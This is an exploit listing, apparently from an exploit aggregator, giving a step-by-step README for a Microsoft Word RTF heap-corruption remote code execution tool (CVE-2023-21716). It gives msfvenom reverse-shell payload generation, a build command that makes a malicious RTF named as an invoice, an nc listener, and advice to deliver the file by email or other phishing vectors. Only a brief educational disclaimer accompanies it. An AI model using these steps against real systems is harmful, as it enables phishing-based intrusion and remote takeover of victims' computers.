Exploit for Integer Overflow or Wraparound in Microsoft CVE-2023-21716

## https://sploitus.com/exploit?id=42DE0E9E-0456-5917-A34D-1F73984A8363
# CVE-2023-21716 — Microsoft Word RTF fonttbl Heap Corruption RCE

**Severity:** Critical (CVSS 9.8)  
**Affected:** Microsoft Word 2013 / 2016 / 2019 / 2021 (unpatched)  
**Patch:** Microsoft February 2023 Patch Tuesday  
**Author:** REGGYRAIDER  

---

## Vulnerability Overview

CVE-2023-21716 is a heap corruption vulnerability in Microsoft Word's RTF parser (`wwlib.dll`).  
When Word parses a `\fonttbl` directive containing **more than 32 767 font entries**, an internal **signed 16-bit counter overflows**, corrupting heap metadata. This allows an attacker to achieve **Remote Code Execution** simply by sending the victim a crafted `.rtf` file.

No macros. No user interaction beyond opening the file.

---

## Setup & Exploit

### Step 1 — Generate raw shellcode with msfvenom
```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4444 -f raw -o payload.bin
```

### Step 2 — Clone this repository
```bash
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716
```

### Step 3 — Build the malicious RTF
```bash
python3 exploit.py payload.bin invoice_march2024.rtf
```

### Step 4 — Start your listener
```bash
nc -lvnp 4444
```

### Step 5 — Deliver the file
Upload via SMB, email attachment, or any phishing vector.  
When the victim opens `invoice_march2024.rtf` in an unpatched Word, you receive a reverse shell.

---

## How It Works

```
Attacker creates RTF          Word parses \fonttbl        Heap corrupted
─────────────────────  ──►   ──────────────────────  ──►  ──────────────
\fonttbl with 32769+         Signed 16-bit counter        Attacker's
font definitions             overflows → 0x8000           shellcode runs
```

1. The exploit embeds **32 769 `\f` font definitions** inside `\fonttbl`.  
2. Word allocates a fixed-size buffer based on the (now overflowed) counter.  
3. Subsequent font writes go **past the allocated buffer**, corrupting adjacent heap chunks.  
4. The raw shellcode (from `payload.bin`) is placed inside `\pict` and lands in the corrupted region, gaining execution when the allocator processes it.

---

## Disclaimer

> This tool is intended **for educational purposes and authorized penetration testing only**.  
> Using this exploit against systems you do not own or have explicit written permission to test is **illegal**.  
> The author takes no responsibility for misuse.

---

## References

- [Microsoft Security Advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21716)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2023-21716)